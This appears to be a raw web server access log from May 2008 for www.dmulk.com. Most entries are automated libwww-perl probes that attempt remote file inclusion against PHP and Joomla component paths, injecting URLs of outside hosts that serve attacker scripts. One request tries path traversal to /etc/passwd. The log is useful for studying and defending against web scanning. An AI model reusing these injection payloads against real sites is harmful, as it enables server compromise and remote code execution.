91.121.115.49 - - [06/May/2008:09:42:08 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:42:09 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:42:12 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.30.216.60 - - [06/May/2008:09:42:25 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:09:42:42 -0700] "GET /logs//language.inc.php?langs_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:09:43:00 -0700] "GET /logs//language.inc.php?langs_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:09:43:01 -0700] "GET //language.inc.php?langs_dir=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.11.23 - - [06/May/2008:09:43:17 -0700] "GET /logs/access_071225.log/index.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:43:52 -0700] "GET /logs/index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:43:52 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:43:53 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:09:43:54 -0700] "GET /index1.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:09:44:13 -0700] "GET /logs/access_080218.log/oneadmin/common/include.php?path[docroot]=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:44:14 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:44:15 -0700] "GET /logs/access_080224.log/web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.221.16.183 - - [06/May/2008:09:44:24 -0700] "GET /logs/access_071210.log HTTP/1.1" 200 177334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; MEGAUPLOAD 2.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:44:30 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
41.221.16.183 - - [06/May/2008:09:44:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Avant Browser" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:44:55 -0700] "GET /logs/index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:44:55 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:44:55 -0700] "GET /logs/access_071230.log//bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:44:55 -0700] "GET //bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:44:56 -0700] "GET /logs//bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:44:56 -0700] "GET /logs/access_080315.log//bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:45:26 -0700] "GET /logs/contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:45:29 -0700] "GET /contenido.php?sec=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:09:45:33 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:45:42 -0700] "GET /logs//bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:45:43 -0700] "GET //bottom.php?style=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:45:47 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:45:47 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:46:17 -0700] "GET /logs/index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:46:17 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:46:18 -0700] "GET /logs/index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:46:18 -0700] "GET /logs/web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:46:19 -0700] "GET /web/components/com_securityimages/configinsert.php=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:46:19 -0700] "GET /index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:46:34 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.67.176 - - [06/May/2008:09:46:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
81.177.4.33 - - [06/May/2008:09:46:51 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:46:52 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:46:56 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:46:57 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:46:57 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:47:12 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:47:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:47:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.3.183 - - [06/May/2008:09:47:19 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:47:31 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:48:05 -0700] "GET /logs/access.log/mcf.php?content=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:48:05 -0700] "GET /mcf.php?content=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:48:05 -0700] "GET /logs/mcf.php?content=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:48:21 -0700] "GET /logs/access_080215.log/mcf.php?content=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:48:54 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:48:54 -0700] "GET /index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:48:54 -0700] "GET /logs/index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:49:02 -0700] "GET /logs/access_080220.log/index1.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:49:05 -0700] "GET /logs/access_080201.log/mcf.php?content=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:49:12 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:50:11 -0700] "GET /logs/index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:50:11 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:50:19 -0700] "GET /logs/index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:50:19 -0700] "GET /index2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:50:55 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:50:55 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:51:08 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:51:08 -0700] "GET /homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:51:09 -0700] "GET /logs/homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.127.57 - - [06/May/2008:09:51:09 -0700] "GET /logs/access_080321.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:51:10 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:52:06 -0700] "GET /logs/homepage.php?sel=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:52:07 -0700] "GET /homepage.php?sel=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:52:26 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:53:09 -0700] "GET /logs/access.log//calendar.php?l=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:53:09 -0700] "GET /logs//calendar.php?l=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:53:09 -0700] "GET //calendar.php?l=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:53:24 -0700] "GET /logs/access_071226.log//calendar.php?l=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:09:53:39 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:53:52 -0700] "GET /logs/access_080215.log/index.php?option=com_mtree&task=listalpha&http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:55:00 -0700] "GET /logs/home.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:55:00 -0700] "GET /home.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:55:05 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:55:24 -0700] "GET /logs/index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:55:27 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:09:56:11 -0700] "GET /logs//index.php?body=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:09:56:13 -0700] "GET //index.php?body=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:56:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:56:18 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:56:19 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:56:22 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:56:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:09:56:23 -0700] "GET /logs//login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.192.241.50 - - [06/May/2008:09:56:24 -0700] "GET //login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:56:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:56:45 -0700] "GET /logs/index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.114.10.247 - - [06/May/2008:09:56:49 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:57:02 -0700] "GET /logs/access_080229.log/index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:57:02 -0700] "GET /index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:57:03 -0700] "GET /logs/index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:57:24 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:57:36 -0700] "GET /logs/index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:57:36 -0700] "GET /index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:57:39 -0700] "GET /logs/index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:57:44 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:57:53 -0700] "GET /logs/access.log//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:57:54 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:57:57 -0700] "GET /logs/index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.111.4.18 - - [06/May/2008:09:57:58 -0700] "GET /index1.php?site=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:09:58:12 -0700] "GET /logs/access.log//login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:09:58:13 -0700] "GET //login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:09:58:13 -0700] "GET /logs//login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:58:36 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:58:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:58:37 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:09:58:39 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:58:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:09:58:40 -0700] "GET /logs/access_080215.log//login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:58:41 -0700] "GET /logs/index1.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:58:41 -0700] "GET /index1.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:09:58:42 -0700] "GET //skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:58:57 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:59:02 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:09:59:02 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:59:22 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:59:45 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:59:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.88.4.5 - - [06/May/2008:09:59:58 -0700] "GET /index1.php?site=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
